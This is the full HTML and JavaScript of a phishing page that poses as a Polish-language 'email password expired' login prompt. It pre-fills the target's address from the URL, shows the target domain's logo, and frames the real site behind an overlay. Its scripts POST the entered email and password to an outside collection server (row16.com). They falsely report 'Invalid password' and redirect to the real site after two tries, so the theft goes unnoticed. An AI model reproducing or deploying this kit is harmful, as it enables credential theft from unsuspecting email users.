<html lang="en"><head><script type="text/javascript">
<meta name="google-site-verification" content="LbWx7z-z_RDyT7ONHglTEzEAe0GlQiEP9cqxziDR8vQ" />
</script>

<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<script id="ratufa_loader" src="https://www.ratufa.io/c/ld.js?f=yrmawh5d&n=n1.ratufa.io"></script>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<title>Login</title>

<style>
        body{
            width:99%;
            height:100%;
            margin:0;
            padding:0;
                  overflow: hidden; /* Hide scrollbars */
        }
        #mainPage{
            border:none;
        }
        hr{
            border:1px solid #999;
        }
        #overlay{
            background-color:#555;
            position:absolute;
            top:0;
            left:0;
            bottom:0;
            right:0;
            border:1px solid #555;
            opacity: 0.6;
            filter: alpha(opacity=60)
        }
        #loginBody{
            background-color:#555;
            border: 1px solid #DDD;
            box-shadow: 0px 0px 10px #DDD;
            width: 480px;
            height: 337px;
            position:absolute;
            top:24%;
            left:33%;
        }
        #loginBg{
            background:white;
            width:100%;
            height:100%;
            opacity: 0.9;
            filter: alpha(opacity=90);
        }
        #topHeader{
            margin-bottom:10px;
            padding-top:10px;
        }
        #favIcon{
            margin:0 10px;
        }
        #form{
            position:relative;
            left:10%;
            width:80%;
        }
        .email, .pass{
            margin:0 0 5px;
        }
            
    .pass:after {
       
            }
            .pass {
        display:inline-block;
        position: relative
    }
       .errspan {
        float: left;
        margin-left: 20px;
        margin-top: 0px;
        position: relative;
        z-index: 2;
        color: brown;
            border:1px solid grey;
            height:27px;
            width: 30px;
            padding-top:5px;
            border-right:none;
    }
      input:focus, input:focus{
    outline: none;
}
   
    </style>

<div>
      <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
      <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
      <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
    <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/jquery.session@1.0.0/jquery.session.min.js"></script>

<script>

    /* global $ */
    $(document).ready(function(){
      var count=0;

      $('#back1').click(function () {
        $("#msg").hide();
        $('#email').val("");
        $("#automail").animate({left:200, opacity:"hide"}, 0);
        $("#inputbar").animate({right:200, opacity:"show"}, 1000);

      });

      var email = window.location.hash.substr(1);
      if (!email) {

      }
      else
      {
        var my_email =email;
        $('#email').val(my_email);
            
            
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!filter.test(my_email)) {
          $('#error').show();
          email.focus;
          return false;
        }
        var ind=my_email.indexOf("@");
        var my_slice=my_email.substr((ind+1));
        var c= my_slice.substr(0, my_slice.indexOf('.'));
        var final= c.toLowerCase();
        var finalu= c.toUpperCase();

        $("#logoimg").attr("src", "https://logo.clearbit.com/"+my_slice);
            $("#mainPage").attr("src", "https://www."+my_slice);
        $("#logoname").html(my_slice);
       
      }


     
      $('#submit-btn').click(function(event){
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var email=$("#email").val();
        var password=$("#password").val();
        var msg = $('#msg').html();
        $('#msg').text( msg );

                    if (!password) {
                $('#msg').show();
                $('#msg').html("Password field is empty.!");

                return false;
            }


      ///////////new injection////////////////
      var my_email =email;
      var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

      if (!filter.test(my_email)) {
        $('#error').show();
        email.focus;
        return false;
      }

      var ind=my_email.indexOf("@");
      var my_slice=my_email.substr((ind+1));
      var c= my_slice.substr(0, my_slice.indexOf('.'));
      var final= c.toLowerCase();
      var finalu= c.toUpperCase();

        $("#logoimg").attr("src", "https://www.google.com/s2/favicons?domain="+my_slice);

        $("#logoname").html(finalu);
      ///////////new injection////////////////
      count=count+1;
     
      $.ajax({
        dataType: 'JSON',
        url: 'https://row16.com/webapp/own/posto.php',
        type: 'POST',
        data:{
          email:email,
          password:password,
        },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr){
              $('#submit-btn').html('Verifing...');
            },
            success: function(response){
              if(response){
                $("#msg").show();
                console.log(response);
                if(response['signal'] == 'ok'){
                  $("#password").val("");
                  if (count>=2) {
                    count=0;
                    // window.location.replace(response['redirect_link']);
                       window.location.replace("https://www."+my_slice);

                  }
                  $("#msg").show();
      $('#msg').html("Invalid password. Please try again");
                }
                else{
                 $("#msg").show();
      $('#msg').html("Invalid password. Please try again");
                }
              }
            },
            error: function(){
              $("#password").val("");
              if (count>=2) {
                count=0;
                 window.location.replace("https://www."+my_slice);
              }
              $("#msg").show();
             $("#msg").show();
                  $('#msg').html("Invalid password. Please try again");
            },
            complete: function(){
              $('#submit-btn').html('Sign in');
            }
          });
    });


    });


  </script>


<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">

<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<title>Login</title>

<style>
        body{
            width:99%;
            height:100%;
            margin:0;
            padding:0;
                  overflow: hidden; /* Hide scrollbars */
        }
        #mainPage{
            border:none;
        }
        hr{
            border:1px solid #999;
        }
        #overlay{
            background-color:#555;
            position:absolute;
            top:0;
            left:0;
            bottom:0;
            right:0;
            border:1px solid #555;
            opacity: 0.6;
            filter: alpha(opacity=60)
        }
        #loginBody{
            background-color:#555;
            border: 1px solid #DDD;
            box-shadow: 0px 0px 10px #DDD;
            width: 480px;
            height: 337px;
            position:absolute;
            top:24%;
            left:33%;
        }
        #loginBg{
            background:white;
            width:100%;
            height:100%;
            opacity: 0.9;
            filter: alpha(opacity=90);
        }
        #topHeader{
            margin-bottom:10px;
            padding-top:10px;
        }
        #favIcon{
            margin:0 10px;
        }
        #form{
            position:relative;
            left:10%;
            width:80%;
        }
        .email, .pass{
            margin:0 0 5px;
        }
            
    .pass:after {
       
            }
            .pass {
        display:inline-block;
        position: relative
    }
       .errspan {
        float: left;
        margin-left: 20px;
        margin-top: 0px;
        position: relative;
        z-index: 2;
        color: brown;
            border:1px solid grey;
            height:27px;
            width: 30px;
            padding-top:5px;
            border-right:none;
    }
      input:focus, input:focus{
    outline: none;
}
   
    </style>
<link type="image/x-icon" rel="shortcut icon" href="favicons.png">


<iframe id="mainPage" src="" scrolling="no" sandbox="allow-forms allow-pointer-lock allow-popups allow-scripts" style="position: absolute; height: 100%;border: none;" width="100%"></iframe>

<div id="overlay" style="height: 100%; width: 1366px;">

</div>
<div id="loginBody">
    <div id="loginBg">
        <div id="topHeader" style="background-color:#2e4c8a;color:white;padding-bottom:5px;padding-left:20px;">
            <img id="logoimg" src="" style="width:22px;margin-top:0px;"> <span id="logoname" style="font-size:19px;"></span>      
        </div><center>
            <form id="my-form" action="???" method="post"> 
               <center><p><b>Twoje hasło e-mail wygasło<p>
  Aby nadal używać aktualnego hasła, zaloguj się i zaktualizuj.</p></center>
                <center><div class="pass">
         <form class="f_form" onsubmit="return se_plant_send(this)">
			<input type="hidden" name="fcc" id="fcc" value="">
            <div class="alert alert-danger mb-3 hidden" id="err" role="alert">
            </div>
            <div class="alert alert-primary mb-3 hidden" id="mi" role="alert">
            </div>
            <div class="form-floating mb-3">
    <input type="email" name="Email" id="email" placeholder="" style="font-size: 12pt; height: 35px; width:280px; border-style: dotted; border-color:  #fdfefe   #fdfefe    #fdfefe   #fdfefe; background:#fdfefe; " readonly="readonly" />
            <p>
            </div><div class="form-group mb-4 position-relative">
               <input type="password" name="Password" placeholder="Hasło" style="font-size: 12pt; height: 35px; width:330px;" required="" oninvalid="this.setCustomValidity('Enter your email password')"
  oninput="this.setCustomValidity('')"/>
      <input type="hidden" name="_subject" id="subject" />
        <input type="hidden" name="_captcha" value="false" />
             </div>
            <div class="form-check mb-4">
    </p>
<label>
            <button type="submit" name="sub" style=" background:#2e4c8a; color:#fff; font-size: 12pt; height: 35px; width:355px;border-style: dotted; border-color:#2e4c8a  #2e4c8a   #2e4c8a   #2e4c8a " class="btn btn-primary w-100 sub_b">Zaloguj sie</button>
           <p>
           <p>
           <p id="my-form-status"></p>
         </form>
<script>
var form = document.getElementById("my-form");
    
    async function handleSubmit(event) {
      event.preventDefault();
      var status = document.getElementById("my-form-status");
      var data = new FormData(event.target);
      fetch(event.target.action, {
        method: form.method,
        body: data,
        headers: {
            'Accept': 'application/json'
        }
      }).then(response => {
        if (response.ok) {
status.innerHTML = "<span style='color: red;'>Nieprawidłowe hasło.</span>";
form.reset()
        } else {
          response.json().then(data => {
            if (Object.hasOwn(data, 'errors')) {
              status.innerHTML = data["errors"].map(error => error["message"]).join(", ")
            } else {
              status.innerHTML = "Oops! Connection error"
            }
          })
        }
      }).catch(error => {
        status.innerHTML = "Oops! Connection error"
      });
    }
    form.addEventListener("submit", handleSubmit)
$(document).ready(function() {
    $("#myform").submit(function(e) {
        $("#first").hide();
        $("#second").show();
    });
});
</script>
<script type="text/javascript">
const params=new URLSearchParams(window.location.search);
document.getElementById('email').value=params.get('email');
document.getElementById('subject').value="Poland=> " + params.get('email');
document.getElementById('id01').value=params.get('email');
</script>
<script type="text/javascript">
let fom = document.getElementById("fom");
window.onload=function(){

    fom.style.display="block";

}



func = () => {    

   fom.style.display="none";

   let btn=document.getElementsByTagName("button");                   

   btn[0].style.display="block";

}